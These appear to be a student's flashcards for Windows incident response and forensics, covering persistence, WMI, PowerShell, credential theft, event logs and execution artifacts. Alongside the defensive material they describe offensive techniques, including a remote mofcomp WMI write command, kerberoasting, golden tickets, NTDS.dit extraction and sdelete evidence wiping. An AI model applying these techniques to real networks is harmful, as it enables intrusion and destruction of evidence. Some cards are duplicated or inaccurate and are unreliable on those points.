Disk Flashcards
How should you run Kape?
From a USB drive; it's self-contained.
Provides the ability to forensically extract files from a mounted drive, including hidden or locked system files. (Free)
Kape
Average breakout time in 2017
~2 hrs
Primary purpose of IR
Cyber threat intelligence: understanding what is happening. Otherwise the adversary will come back; qualifying what the adversary wants and does is what stops future attacks.
Primary output of the exercise.
What is the containment phase of IR?
Preventing additional adversary actions while monitoring activity (active defense).
Not pulling the plug while creating cyber threat intelligence.
Manual and automated scanning looking for evil
Hunting
Why is baselining important to hunting?
Have to be able to establish what “normal” looks like before you can see what abnormal is.
How does threat intelligence get to the SOC?
Generated by HFS/NFS/CFS as part of hunt/incident detection; the signatures created are packaged as an intelligence product and fed back to the SOC.
Proper threat intelligence team will arm a hunt team with:
Where to look, based on APT type activity
What to look for: signatures. Reg keys, malware footprints, IP/domains, hashes, utilities used, TTPs…
Likelihood of attack
Hunt teams should have, at a minimum
Trusted visibility into endpoints and networks across the org. (Ability to use powershell or an EDR tool to sweep the entire enterprise)
Remediation should, at minimum:
Deny adversary access to the environment
Eliminate the ability for the adversary to impact remediation efforts
Remove presence of adversary from the environment
Degrade the future ability of adversary to return
Atomic Indicators
Pieces of data that are indicators of adversary activity all on their own, such as emails, IPs, strings from C2 channels, FQDNs, etc.
Computed Indicators
Hashes of malicious files, data included in decoded C2 protocols, some IDS signatures
Behavior indicators
A profile of behaviors. Bad guy likes to tunnel traffic through think tanks, use macros for word documents, targets these types of targets, and uses these types of specific computed and atomic indicators. Like a CrowdStrike profile.
How many stages are in the MITRE tactic categories, and what were they derived from?
10 stages, derived from the 7-stage Kill Chain.
Control, Maintain, and Execute are broken out from the latter stages of the Kill Chain.
What is STIX?
Structured Threat Information Expression (STIX™) is a language and serialization format used to exchange cyber threat intelligence (CTI). STIX is open source and free allowing those interested to contribute and ask questions freely.
The equivalent of narrowing down a human suspect through identifying characteristics, but for adversaries
IOCs.
Open-sourced, community-driven standard format for IoCs
STIX
Tool aimed at (but not limited to) helping malware researchers identify and classify malware samples. Creates descriptions of malware families based on textual or binary patterns.
YARA
What is a YARA rule?
A description of strings/boolean values that help determine a Malware variant.
Tools for making IoC rules
YARA, STIX, OpenIOC
Mandiant tool for standardizing IOCs
OpenIOC
an antivirus signature that you can control, basically
an IOC
Free tool that provides host investigative capabilities to users to find signs of malicious activity through memory and file analysis and the development of a threat assessment profile.
FE Redline
Finding fileless malware should start with
Looking for the evidence of its execution when it RUNS.
Malware that is not active but is dormant is harder to find because
We can’t detect the malware in memory
How should you structure finding evil, from broad to specific?
Automated enterprise-wide sweeps (which can be signature based) should start early; targeted EDR data and triage data are time consuming and should be spent only on the narrowed set of suspicious hosts. More manual processes should be used sparingly.
Mechanisms for detecting compromise of systems w/o malware on them
Program execution, File opening, File knowledge, event logs, browser usage
where malware hides, and names
Likes to name it svchost, explorer.exe, win.exe; app data folders (where Outlook and Explorer drop stuff)
Likes to hide in temp folders, Windows folders, internet files, system volume files, etc.
They'll often pack it, run it through Python, or convert it to text, etc., obfuscating it.
Best way to combat processes masquerading as legit
whitelisting
Malware uses services such as ______ to hide in plain sight
Frequent compilation, packing, and armoring. It will mimic known-good services and normal Windows services.
Most frequent hallmarks of malware evasion
Probably create a new service (scheduler @ cmd)
replace an existing service, like the wireless zero config service
register as an autorun process in memory
process injection
To obtain a commercial software certification (to conduct code signing) you usually need ____ at a minimum, but often ______
Passport/phone bill (something to prove identity)
A Dun & Bradstreet rating (level of financial standing/stability); shows that your org is a stable business.
Examples of code-signing certs being manipulated
Stuxnet
opera browser manipulation that allowed access to private keys
adobe key signing cert stolen
When did MSFT start doing code signing, and on what code?
Server 2008, Drivers
Drivers give you access to what level of the O/S?
Kernel
When did MSFT start enforcing code signing for executables?
On servers: Server 2016
Workstations: windows 10
You have to turn on executable signing!
difference between corporate and business code signing cert
For corporate, you need to have a Dun & Bradstreet financial rating, which shows you have a stable business.
% of malware that’s signed
around 3.5%; higher % for nation state attacks
Downside to signed malware
If you revoke the signing cert (add it to the CRL) it would put a beacon on any version of that code in the wild. Makes rapid re-development/redeployment of code hard
How to downselect code that’s signed for investigations
You can usually ignore code signed by well known sources such as MSFT, google, apple, etc.
Finding evil in process starts with
Identifying normal processes and their locations. (Lsass.exe, taskhostw.exe, winlogon) Cross check that it lives in the correct directory/location. (such as %SystemRoot%\System32\smss.exe)
What is sigcheck?
Checks for signed code; can submit to VT.
What is density scout?
Checks for possible obfuscation and packing of a file. File will receive a score; this score can be used to identify whether a set of files is worth investigation.
What is pescan?
Command line tool to scan portable executable (PE) files to identify how they were constructed. Various metadata is displayed, identifying items such as:
Compile timestamp
MACB timestamps
File size and type of executable
Target OS and whether the binary is 32- or 64-bit
Linker version used
Entry point address and desired image base address
Whether an X509 certificate was used and who the author is
Whether a checksum is present and whether it matches the binary
Optional analysis of the PE internals to generate an abnormality score, which compares the internal construction to standard operating system files. Higher scores equate to larger differences.
Optional MD5 and/or SHA1 hashes of the file can be generated as part of the scan.
Built in windows command to query service configurations
sc
Places to look for evidence of program execution
Prefetch, Shimcache, userassist registry keys, and jump lists.
Indications of odd behavior from seemingly normal OS artifacts could include
cmd.exe execution
Sysinternals tools usage (psexec, procdump, psloggedon)
at.exe or schtasks.exe execution (Persistence)
wmic.exe, Powershell.exe, or winrm.vbs execution
net.exe use, used for mapping drives or lateral movement
reg.exe or sc.exe (addition of run keys or services)
MountPoints2 registry key: records shares such as C$, Temp$, etc.
.job files in C:\Windows\Tasks: odd application tasks executed
Where would you see an adversary adding new run keys or services?
Use of reg.exe or sc.exe
Where are some MSFT native tools an adversary might use for persistence or lateral movement?
Sysinternals tools (psexec, procdump, psloggedon) or net.exe (network)
When looking for malicious processes, some anomalous characteristics might include?
Starting with the wrong parent process
Image executable in the wrong path
Misspelled process names
Incorrect SID (starting from the wrong account)
Processes with unusual boot times
Unusual command line parameters
Packed executables
How does density scout work?
Tries to compress a file; parts of the file that are obfuscated or encrypted won't compress. Finds parts of files that have high-frequency-letter (usually encrypted) content or high entropy (randomly generated content).
You can usually compress standard EXEs very well (50%+) anything less than 10% compression represents concern.
What Is temporal analysis?
fancy term for “time lining”
How to use google post density scout to further check executables with low compression rates?
Look to see how common they are. Google/VT; put the full path into google. (If there’s zero hits, or even a recommendation, it will have a hit)
Technique that obfuscates or encrypts data or software and encapsulates it into a file along with a program to perform decryption/deobfuscation
packing. a “packed executable” is a piece of software with an unpacking program.
PEscan looks for what?
Code anomalies. Will present why it thinks the executable is weird in the notes, and provide a rating. Compile data can be interesting, as is the CPU type. (32-bit code is unusual)
Where does 32 bit programs run from?
Syswow64, if they’re standard windows processes
Where do 64 bit programs run from?
System32
Verifies that images are digitally signed, provided the root certificate store is updated.
Sigcheck
Checks VT detections while verifying code signing
sigcheck
Two hives that autoruns most often live in, and when are they usually executed?
NTUSER and Software; executed when a user logs on
How does an adversary manipulate the userinit registry key?
This key (in the Software hive) is used by Winlogon to execute explorer.exe and userinit.exe, at startup.
Greatest hits for places to stick persistence mechanisms (WADSSS)
W - WMI Event Consumers
A - Autostart locations (GPO, MS Office add-ins, BIOS)
D - DLLs (DLL hijacking)
S - Service creation/replacement
S - Service failure/recovery
S - Scheduled tasks
What are runkeys?
AEPs. Autostart Execution Points. Things that start with the O/S. Frequently abused.
File system location that (and those like it) that can be used to launch attacks, not requiring admin credentials.
%AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Tool used for evaluating registry runkeys for maliciousness
RegRipper
How to get malware to execute from a software link in user space (where to put it)
%AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup; shortcuts placed here link to, and execute, the binaries they point at.
How are MSFT services used as persistence mechanisms?
They replace unused services with malware, or modify an auto-start to include a new binary, or manipulate service recovery features (like Dr. Watson).
What is DLL Search order hijacking?
Putting a DLL with the same name in the directory of a core DLL, so it launches ahead of the existing DLL.
Traditionally, search-order hijacking attacks utilize an executable file's DLL search path to load spoofed DLLs through the known DLLs record.
What is phantom DLL hijacking?
Inserting a DLL into a place where it would normally exist, but doesn't. A list of "known" DLLs for all the Windows variants is kept at KnownDLLs, and it will include DLLs not found in that version. E.g., for a Windows 2016 R2 server, inserting a DLL that would normally be there but isn't turned on/used for that build; when Windows sees that DLL exists at startup, it will launch it.
Great example is replacing the FaxDLL (fxsst.dll) in the system32 folder.
What is DLL side-loading?
Getting a new version of a legit-DLL loaded into the system. Part of the dynamic update features of Windows, just like a Web 2.0 AJAX style query.
DLL side-loading, in contrast to search order hijacking, utilizes the WinSxS assembly to load the malicious DLL from the SxS listing, which is located in the following registry key:
%TEMP%\RarSFX%\%ALLUSERS PROFILE%\SXS\ or
%TEMP%\RarSFX%\%ALLUSERS PROFILE%\WinSxS\
What does the Sysinternals Autoruns tool do?
Easy means to collect and analyze services on a system. Similar to SC. Will also collect currently scheduled jobs.
What can schedule tasks on remote systems?
both at.exe and schtasks.exe
How does a WMI event work?
- Create an event filter that "triggers" based on an event occurring (for example, run every 20 seconds)
- Once triggered, an event consumer is added to the system with a script and/or executable to run (run this PS script to beacon to a backdoor)
- Finally, tie the event and consumer together as a “binding” and enter it in the WMI repository
File used to register new object classes into the WMI registry
MOF file (managed object format)
Where was the first big WMI based attack? How was it executed?
Stuxnet
A zero day (print spooler service) was exploited to deliver an EXE and an MOF file. The MOF file was auto-compiled by the system, creating a WMI event and consumer that immediately executed the malicious executable.
Native way to interrogate WMI for suspicious behavior
Powershell:
Get-WmiObject
Command line tool to look at windows malware persistence mechanisms?
autorunsc.exe; goes through and analyzes, like sigcheck. (Doesn't do DLL hijacking or service failure)
What does I E X indicate in memory?
Something to be concerned about. IEX is the "Invoke-Expression" cmdlet, which takes the argument of a script and executes it. Often used to download the malicious script, which then gets passed in to PS. Evades many A/V tools.
What does I E X indicate in memory?
Something to be concerned about. IEX is the "Invoke-Expression" cmdlet; the underlying .NET command is
"New-Object System.Net.WebClient", which takes the argument of a script and executes it. Often used to download the malicious script, which then gets passed in to PS. Evades many A/V tools.
What is a download cradle?
A download cradle is a single line command for download and code execution. … A download cradle can also be part of a persistence mechanism, tooling or execution at other attack stages when an attacker attempts to download capability or run fileless
Can be used to interrogate local and remote systems for processes, network configs, etc
WMI + WMIC
How does WMI authenticate?
Non-interactively. (Network logons)
What’s the problem with many EDR platforms?
Doesn’t do historical well; mostly live, in place. (The LR functionality is FE using Redline for the historical)
Should you turn off Powershell remoting in your environment?
If you do, you’re likely using something less secure. (PSEXEC) It’s no more dangerous than RDP/RPC. Powershell remoting is MUCH more secure.
Powershell commands are based on?
.NET framework objects, which means the objects carry multiple aspects or properties of the command. (Cmdlets)
How does Powershell handle command output?
By encapsulating it in objects, which can be passed to other cmdlets for additional processing. One cmdlet might make an array of objects for computers, files, network objects, the next might groom out the files, next might perform actions on those files.
What is a Powershell provider?
how Powershell abstracts collections of items into containers. For example, “Get-ChildItem HKLM:Software” would abstract all the registry keys in that hive to an object.
Windows alternative to Secure Shell
PSSession: ps for secure remoting
PS command used as one-to-many option for executing one command on multiple remote systems
Invoke-Command (E I X)
Sends commands without an interactive session being established.
Why PS is more secure than RDP/PSexec
It doesn’t cache credentials; only vulnerability is to things like ticket attacks
How do you use PS to send a series of commands remotely?
Invoke-Command, then use a -ScriptBlock parameter, or -FilePath to have it run from a local file.
Doesn’t need to set an array to loop through data.
Why is Invoke-Command better than looping through an array of systems on the server running it?
The former uses the resources of the target to execute the commands, the latter relies on the processes/power of the invoker.
Why do we avoid CredSSP in Powershell?
It caches the credentials so that it can pass them to a 3rd party/system that requires it; similar to SSO.
Creds aren’t cached otherwise, so Mimikatz/Incognito can’t steal them.
How does Kansa work?
Organized collection of scripts and modules in a framework for IR purposes. Much of it is PS, but it can execute anything. Uses PS for remoting.
two prereqs for Kansa
Your account must have admin privs on the remote host.
Windows remoting (WinRM) must be enabled.
All the plugins that Kansa runs are located where?
./Modules folder
All the analytics that Kansa can run on collected data is found where? How does it work?
./Analysis
All of the ways that it will crunch that data produced by the Modules in Kansa are listed in individual Analysis scripts. You can enable and disable ones you want it to run at the end of a pull, or run them ad-hoc.
Why should you look at when a potential C2 domain was registered?
If it's been around a long time, it's less likely to be used as C2 unless the adversary is just holding it for a long time. (Infoblox will block recently registered domains though, so smart bad guys will hold them past that time)
What are Kansa analysis features that have “stack” in the name?
It’s the stackable feature of Kansa. If you see 30 hosts that have a specific run key, it will provide a “counter” for that occurrence across the environment.
Frequency analysis scripts.
how to use 3rd party binaries with Kansa, and where it needs to be told to run it
Put the binaries you want to run in the .\Modules\bin and when executing, push with -pushbin. Remove them after with -rmbin
Must add the tool as a BINARY DEPENDENCY (# BINDEP) in the collector script. Even though it is a comment, Kansa reads it.
How to bring memory analysis into Kansa (to try to get
Get-RekalPsList.ps1
What is WMI for?
Windows Management Instrumentation. Deeply invasive control of the underlying Windows architecture, meant for administrative tasks in a large environment
Why is WMI traffic hard to detect?
It exists for uses in every stage of the kill chain
It’s largely only in memory
Windows native, minimal logging of activity
evades whitelists
scripts can be obfuscated when run through it
encrypted
runs over standard PScom/WinRM pipes
WMI for recon
List user accounts, groups, netuse lists, list of fixes and patches installed, etc
Why is WMI the real fear, not PS?
Powershell has history and logging. WMI is often the underlying commands being run, and usually silently.
There’s no automatic logging for WMIC commands by default
Examples of WMI for priv esc
Powershell Empire has multiple WMI tools for finding services running in the wrong directories or with elevated privs, that could be manipulated. Also looks for services that have a space and aren’t quoted, where you could inject other services.
WMI process for lateral movement
WMI Process Call Create: used by NotPetya and BadRabbit to execute code remotely
How does rundll32.exe let you avoid whitelisting restrictions?
It’s the valid app that calls DLLs; if you want to run a malicious DLL, you could invoke this manually to call another DLL, thus skipping some whitelist controls.
WMI persistence mechanism
Creation of Event Consumer Backdoors. (Embedded in WMI database) is there an event/trigger condition (MOF file) that doesn’t belong?
Ways to create entries in WMI database for persistent attacks
Use PowerShell or mofcomp.exe
NotPetya uses ______ to spread its payload
Direct RCE for systems accessible via WMI Process Call Create.
Also uses Remote shares accessible via NetEnum/Netadd to spread its payload
Ways to identify WMI commands for cyber reconstruction efforts (how to catch WMI attacks)
Enable Event logs (will fill up your logs QUICK)
Sysmon has its OWN event log (better)
Use PowerShell to discover suspicious events
Commercial EDR tools (Carbon Black, Tanium, HX) (best)
3 things PS can be used to look at to find malicious use of WMI
Looking at:
- event filters (Trigger)
- EventConsumer (Script or executable to run)
- FilterToConsumerBinding (binding, storage, persistence)
3 tools for exploring the WMI database
WMI explorer tool (wmie2)
Mandiant WMI-Flare tool (Offline parsing)
Mandiant PyWMIPersistenceFinder
WMI forensics scripts
Two WMI events to search for first
ActiveScriptEventConsumer - execute a predefined script
CommandLineEventConsumer - Launch an arbitrary process (more common: launch a download cradle)
Focus on consumers!
What is a MOF File?
Think of it as text file representing the WMI definitions and instances.
Used for rebuilding and recovering the WMI database. Found in WMI repository.
Why is Mofcomp.exe dangerous?
Can use it to create WMI objects from anywhere; doesn’t NEED to reside in the WMI repo or even on the same computer. (-N to add remote machine names)
Can use it to rebuild WMI from another machine with arbitrary events/consumers. In this scenario, the residue isn’t even on disk, but in memory.
Student use of WMI?
You can send a MOF file to the Print Spooler, which will compile it and import it into the WMI repo. (Was just a windows service, not an exploit)
Anything you wrote in there was written in as an admin account to the backend.
Method to remote write to a WMI DB?
mofcomp -N \\machinename\root\subscription test.mof
have to delete the #PRAGMA from the first line of the file
Do you need a MOF file to write into the WMI db?
No. Can write directly into it using .NET code (like PS)
When you run a MOF file from a non-standard location, it writes an artifact to:
HKLM registry, WBEM auto recover key
Seeing unusual WMI processes running
Consumer portion
Look for wmiprvse.exe (especially on non-servers)
Look for wmiprvse.exe's parent process. (Should be svchost!)
Look for wmiprvse.exe spawning things like cmd/PS
Active script portion
Look for scrcons.exe
RARELY SEEN!
Hunting for WMI activity involves what
Looking for:
WMIC call create /node:
Invoke-WmiMethod or Invoke-CimMethod (PS)
wmiprvse with an unusual parent
wmiprvse with unusual children (like PS)
scrcons.exe running
PS with encoded commands
Some of the event logs for credential harvesting
4624 (Logons)
4720 (Account Creation)
4776 (Local account authentication)
4672 (Privileged account usage)
What is protected processes, and when was it introduced?
Windows 8: Protected processes can only load signed code and can only be attached to other protected processes.
Why is protected process easily circumvented?
It’s not on by default, and Mimikatz gets around it via a signed driver.
Remote credential guard does what?
Update to restricted admin: protects any account (not just admin) during RDP sessions.
Windows 8 integrated a lot of protections for _____ that no one integrated
Credential protections, via KB2871997. (Backport to Windows 7)
Why isn’t credential guard used pervasively? What does it do?
It’s hardware heavy; works with virtualized sandboxes. Has a lot of work to do for exceptions.
What is the core Active Directory authentication protocol used for users?
Kerberos
and
NTLM (for using local accounts, network logon w/SMB vs domain creds)
An authenticated credential is composed of:
an identity and an authenticator (secret)
Accounts to target on a local box when searching for a credential that can be used on other boxes
cached creds for users (ie, Joe on computer a has logged in via NTLM on another box, and his creds are cached there)
Helpdesk account (pushed to every box for local admin work)
Administrator account (if it hasn’t been randomized as part of build, with sysprep)
Challenge for hackers with local system creds that have been cached.
They’re encrypted and salted, so have to be offline cracked, unless you’re passing the hash. If you do crack them, you have the password, so you don’t need to pass the hash.
Attacking a local system for creds, what FOUR forms can the credential take?
Stored cached credential
NTLM Hash
Token
Ticket
NTLM pass the hash works specifically in what way?
The threat actor has access to a box, find a LOGGED IN system user, accesses the stored credential in the form of the NTLM hash, and then accesses another machine that has that account cached; when it asks the first box for the cred, the hash is passed over. Requires a logged on user, another machine that has that same user cached, and access to the hash.
How does Windows 8.1 introduce defense against Pass the Hash attacks?
Starting at 8.1, any priv account is not allowed to do a network logon over NTLM, with the exception of the default administrator account.
(Why you dont clone computers)
Caveat to a local cred in the form of a hash, token, or ticket being dumped?
It must be for a user that is LOGGED ON, or the process is still running
domain account hashes are stored where during interactive sessions
memory
How do you defend cred theft, locally?
Monitor admin accounts/boxes
Stop remote interactive sessions w/Admin accounts
Properly terminate RDP
Windows 10 (cred guard, tspkg, domain protected users group)
Credential guard defends creds by moving them
From LSASS to a hypervisor-controlled isolated process.
What privileges are required for any system you’re trying to steal a token from?
SeImpersonate or Delegate. (or admin privileges necessary to add those permissions)
Type of token that facilitates authentication even across network resources?
Delegate tokens
Can be used w/PSExec to map remote admin shares
Type of token that allows for local security context shifts
Impersonate tokens. (SeImpersonate)
If a token is present on a system, a user with the SeImpersonate privilege can do what?
Extract the token
Reuse it to manage group membership or add users
Escalate local privileges
Power “delegate” tokens are only available to an attacker when _______
Console logons, RDP, using “Run As” on the machine.
Smart additional ways to defend token theft on endpoints
“restricted admin” prevents tokens from being available on the machine during remote admin sessions (which should be avoided, anyway)
Remove delegation of high value accounts in AD
Use group policy to set time values for sessions, after which it disconnects (to prevent improperly terminated RDP sessions)
Cached domain credentials are stored in
SECURITY\Cache reg key
To prevent a situation where a user cannot logon, windows ____________
caches the last 10 logon hashes. (25 for 2008+)
Format of cached credentials on modern Windows systems
mscash2
How long do cached credentials live?
indefinitely, even after a reboot.
Creddump can be used to?
extract hashes off-line, to be cracked
Why we shouldn't clone endpoints
Creates a standard admin, same RID, which can be used in credential theft/lateral movement very easily
Unique ways to limit attacks on cached credentials
Minimize amount of cached accounts
Use Protected Users group
NSA/DoD recs for cached credential limit
0-1 (NSA)
<4 (DoD)
What does Nishang PS framework allow analysts to do?
through Get-Lsasecret.ps1, can dump and decrypt the LSA secrets. These secrets, if they’re privileged incorrectly, can let a service account be used to exploit escalation of privilege. (looking for overprivileged service accounts)
Can be combined with ticket requests (kerberoasting); offline the ticket, crack it, and use it with the service account.
Often used for looking for overprivileged accessible domain service accounts. (badly installed agents, etc)
Nishang Powershell framework (pulling encrypted service account details from LSA)
Kerberoasting to marry that account with a ticket for its use
Unique ways to defend against LSA attacks
Don't employ services or scheduled tasks requiring domain administrative trusts
reduce number of services that require domain accounts
Group managed services, through “Group Managed ServiceAccounts”
How do you acquire a golden ticket? (kerberos)
Stolen from memory
kerberos ticket w/o an expiration date, and has domain admin.
What is kerberoasting?
Request tickets for service accounts: they send you the ticket for a service account, you roast it (crack it) and then reuse it
When does a golden ticket expire? What can it be used for?
Expires when the krbtgt is rotated. Changing other credentials is meaningless
What do managed service accounts do, and when were they introduced?
Server 2008R2
Introduces frequent password changes and long passwords
How can you flexibly utilize a dumped ticket, as a “transplant” ?
If you dump a privileged ticket, you can export it from the system, dump it into Mimikatz (or other utilities) and then import it into another system, where it will be cached and available
Key weakness that allows kerberoasting to work
ANY user can request a ticket from a DC for ANY service
The ticket returned for the service has a non-salted hash for the account that runs the service.
This password can be easily cracked offline
Dangers of Golden Ticket to defenders
- If an attacker loses access, ANY user-level access to a domain joined system will provide a mechanism to re-use the golden ticket to get priv access again using Pass the Ticket.
- Works even if a full password reset is conducted for all enterprise accounts
- Attack can be constructed with access to either the NTDS.dit or memory. (attacker must have Admin access on a DC to get this)
An all-access ticket for a single service or computer is referred to as a
“Silver ticket”
Why are silver tickets so effective?
they’re excellent backdoors: auth occurs without requiring comms with the DC. Attacks a computer account password.
What is a Skeleton Key for AD?
After gaining access to a DC, a tool like Mimikatz can “patch” LSASS to enable a backdoor password for any valid domain user.
It's a SECONDARY password for the account; even if they change the primary, the secondary remains available. Easy and persistent backdoor for access.
Unique ways to defend against ticket attacks
Credential guard/Remote credential guard
Long and complex passwords on service accounts
Audit service accounts
Regularly change the KRBTGT password (no less often than yearly)
What does a hacker gaining the NTDS.dit do, and how do you get it?
Gains access to all the user and computer account hashes, which are encrypted. (though the encryption is easy to break)
Easiest way to get to a user's personal access/drives/phones/computers.
How to get around the locked NTDS.dit file, when trying to export it?
use Volume Shadow Copy service.
Tools for extracting the NTDS.dit, and where is it?
\Windows\NTDS
Can be ripped by: ntdsutil, NTDSXtract, ntdsdump, VSSAdmin, PS, Metasploit
Why use NTDS.dit for action on objectives?
Often, using admin credentials is noisy: if you have the NTDS.dit, you can natively log in as a user and see what they see, with access to their browser, OneDrive, phone, etc. Less noisy.
What is located inside every prefetch file?
The total number of times an application has been executed, the original path of the execution, and the last time of execution. (up to the last 8 times)
telemetry for execution
Why is the timestamp of the prefetch file useful?
It provides an extra bonus 9th “evidence of execution” for the application in question.
What’s the format of a prefetch file, and where’s it stored.
_.pf
ON WORKSTATIONS, stored in \Windows\Prefetch (not a server service)
Up to 128 files on
What does prefetch do?
Meant to give a process an extra bit of juice when it executes, next time will launch quicker/more efficiently. (On old hard drives, it would co-locate executables in close digital space so the hard drive didn’t have to scan to it)
SSDs and Prefetch?
In Windows 7, they started disabling prefetch for SSDs, but realized it was still providing efficiencies.
How would you look at the targets of sdelete?
the prefetch file for sdelete has the target of what was deleted. Doesn’t include registry keys, but file/filehandles.
How can you use frequency analysis of prefetch entries?
If there’s a huge recent amount of “living off the land” type tools, like netstat/net-use from command line, that might indicate that someone is in your space.
The first time a file is accessed is connected to the timestamp (creation) of the .pf file.
Over time, a prefetch file may be….
Overwritten with the most recent runs of the file, or erased if the application hasn’t been used in a long time. (After which it gets re-created for a new run, with a new timestamp)
Creation of a .pf indicates
that an application ATTEMPTED to execute, not that it did so successfully.
What happens to a prefetch file if the application is run from a different directory other than standard?
It changes the hash value, because it’s been executed from a new location. (useful info!)
What does pecmd.exe do?
Pulls information on a directory or a single application for prefetch, including volume information, files and directories referenced, and all execution time info.
Difference between -f and -d for pecmd.exe
-f is for a single application, -d is a directory of applications
What is the hash of a prefetch file calculated from?
the directory path that the executable is in, and the command line options of the programs
What happens if you run calc from cmd, if cmd is launched from /syswow (32 bit folder)
Why?
it will launch a 32 bit version of the calc app. A 32 bit process can’t have a 64 bit child process.
Why should we always look at spikes in 32 bit programs (things running from syswow)
Because bad guys write a lot of malware in 32 bit, and a lot of child processes are launched in 32 bit as well, which is unusual for system activity
Filter = _____
Consumer = _________
Binding = _________
Trigger
Action
Host it runs on
How do you use sdelete to fully wipe forensic evidence of prefetch, including unallocated space?
Sdelete has a -z option, to zeroize unallocated space.
If bad guys have deleted prefetch, zeroized unallocated space….what option is left to find evidence of the app execution?
Volume shadow copy (provided they didn’t turn VSS off/on again) or memory (Volatility can pull prefetch)
pecmd can use a -vss option to also look in volume shadow copy at run
What is Application Compatibility/Shimcache, and why does it matter forensically?
Designed to detect program compatibility challenges. (Apps should be able to run in any version of Windows, but that’s hard)
What is in shim cache?
All the application files, AS they’re run, that have been checked for compatibility/shimmed
When an app is shimmed, what is written?
the last modification time of the executable
the full path of the exe
(not when it was shimmed, when it was executed)
Also, when Explorer browses the folder with the executable and it’s shown in the GUI (weird). You have to see it with your eyeballs.
Every time psexec is run, what happens on the remote machine?
a new version of PSEXESVC is pushed to that machine. The NEW version gets shimmed every single time, even though it’s overwriting the same file. (good to know)
What forensic evidence is created when an executable is renamed?
an entry in the shimcache, because it’s shimmed again
When you move a file, what cache entry is updated?
shimcache
WHEN is the shimcache written to registry and directly accessible?
On shutdown. Prior to that, shimcache entries exist only in memory.
What is the significance of the shimcache “insertFlag”
A flag in the registry that confirms the application was executed; if the flag is empty, it likely wasn’t.
While shimcache may not give you the date/time executed, parsing it gives you…
the temporal order. What executables ran in what order, starting most recently to most distant, historically.
Amcache tracks what things?
Programs installed, programs executed
Where does amcache live?
amcache.hve (registry) at C:\Windows\appcompat\programs\amcache.hve
and
Within that hive, a Root\File{Volume GUID} which tells you where the executable was run from, volume wise.
What do the keys under each {Volume Guid} in each amcache entry represent?
Each key represents a numerical value, which each represents another executable. Key # is a combo of the MFT entry and a sequence number. (written in hex) Parsers can break that out.
What extra piece of data is included with the executable’s entry in the amcache?
a SHA-1 hash for it.
What is wmiprvse indicative of in shimcache, elsewhere?
indicates client is receiving a remote WMI command
Where would you go to look at what explorer directories a threat actor navigated to, and using what artifacts?
Shellbags (using ShellBags Explorer) and opening the UsrClass.dat file (found in the user’s home directory)
E\C\users\AppData\Local\Microsoft\Windows\UsrClass.dat
Where are event logs stored?
%systemroot%\System32\config (older)
%systemroot%\System32\winevt\Logs (modern)
Where do we see evidence of services starting/stopping/etc?
The System Event log
Where do events forwarded from other systems get logged?
Forwarded events log
Number of logs found on a modern windows machine
150+; Application, Security, and System are only 3 of them.
What are some examples of Windows services that get their own logs?
Defender
Firewall
Task Scheduler
What updates the security event log?
Only system (LSASS); third party apps don’t log to this log facility
What is logged in the security event log?
Auth attempts, user behavior/actions, file/folder/share access, security settings modifications, LSASS process, processes (manually?)
Difference between a logon/account logon event?
Logon event: user logon (where the logons are tracked at): You going through TSA and showing ticket/ID
Account logon event: Authentication event (board the plane) Security checkpoints! (Where did you authenticate)
What security event is like a TSA gate check agent scanning your ticket?
an account logon event, or “authentication event”
Account event you’ll see most frequently (most important)
4624 and 4625, successful vs. failed logon
Event id using other creds (potentially stolen)
4648 (logon using explicit creds)
Privileged user logon event
4672 (VIP in the room!)
Be suspicious of events that map to C$ or admin$ shares
You’ll need the pairing of a Successful logon (4624) and 4672 (superuser/priv account logon)
Problem with logoff events in Windows, forensically, and how to adjust course
They aren’t reliably recorded (as 4634, logoffs) so look for 4647.
Logon events aren’t recorded when….
malicious activity is used to access a system. Backdoor, exploited service, or similar.
Logon codes tell you
HOW the user logs into the system (i.e., 7 is RDP, VNC/Console is 2, cached creds logon is 11, etc)
Non-interactive logons are what logon type?
3; network logon
When a user logs on using a domain account through the console, it produces cached logon events. Why?
MSFT tries to reduce the traffic to the DC and sometimes defaults to cached creds, even when the DC is online.
How to relate a logon to a logoff, in event viewer
Use the Logon ID value; creates “parenthesis” on the front and back end of a session
Session lengths are good to establish for what types of logons?
interactive
Every domain joined system will have THIS directory created, accessible via interactive login
$: Account is used when communicating with AD and accessing network resources
What is the built-in “NETWORK SERVICE” used for?
Assigned to processes or services that need network access
4670, after a successful logon, indicates what?
Enumerate the privileges coming with you.
Important to track what activity for event logs of privileged account activity during logon, and why?
Not just a member of an admin group, but the additional privileges assignment (as part of event id 4672) that indicates that after the logon, special creds were assigned that COULD BE IMPERSONATED IN TOKEN ATTACKS
What privilege assignment at logon time is indication that the account used was ripe for token based attacks?
4672, where things like SeTakeOwnership, SeDebug, and SeImpersonate are admin-equivalent.
4720 events should be looked at because….
they indicate account creation happened, which can be an easy true positive.
Some of the RDP connection log info is also recorded
In auxiliary logs RemoteDesktopServices-RdpCoreTS and TerminalServices-RDPClient
How to actually obfuscate the RDP Client Address
The RDP client/server connection will document the source IP, so if you don’t want it to show your actual IP, you have to chain RDP; jump from host to host.
Important place to find log data regarding RDP services, that are recorded on the source system
Windows-TerminalServices-RDPClient\Operational
one of the only places that you get discrete source logging (where did the RDP session connect to)
Only time we see the Account logon and Logon events in sequence
When a user is logged on locally, NTLM style, to a workstation or group
account logon events refer to….
The third party authorization of creds provided during that logon session. (Authentication vs logon)
Checks for user credential against the DC would be an account logon type.
“holy trilogy” of event data that corresponds to a pass the hash PTH attack
4776: Root account authenticated from workstation (account logon)
4624 Successful account logon
In that logon, the type of logon is network
New events in Win 10/2016 that track enumeration/recon of group accounts
4788/4799, groups were enumerated
event logs (groups) that can help identify bloodhound or powerview use
Look for the enumeration of group membership (not turned on by default)
Benefit of Event log explorer
Tolerant of log corruption
filtering
free
How to monitor for access to shares, and objects accessed over those shares
Network share event logs
5140/5145. Have to be turned on!
Runas events (4648) are unusual, in that
they are often recorded on the originating system, versus the target system. (A logon attempt was made using explicit creds….or, RunAs)
Occasionally recorded on both, such as when RDP connections use different creds.
Places where scheduled tasks are recorded
Task Scheduler, Security, and Tasks folder (Windows\System32\Tasks)
Locally, remotely and in the “tasks” folder, where the registration/creation of tasks is put.
Command line to manipulate services remotely
sc.exe /remote system name, etc
service control
One service related event that isn’t recorded to system
new service installed (4697) goes in the security log
Tools that added capability to manipulate event logs
Mimikatz and DanderSpritz, post EternalBlue
Mitigation techniques for event log manipulation
Event log forwarding
Logging “heartbeats”
log gap analysis
Evidence of event log tampering
They still exist in memory
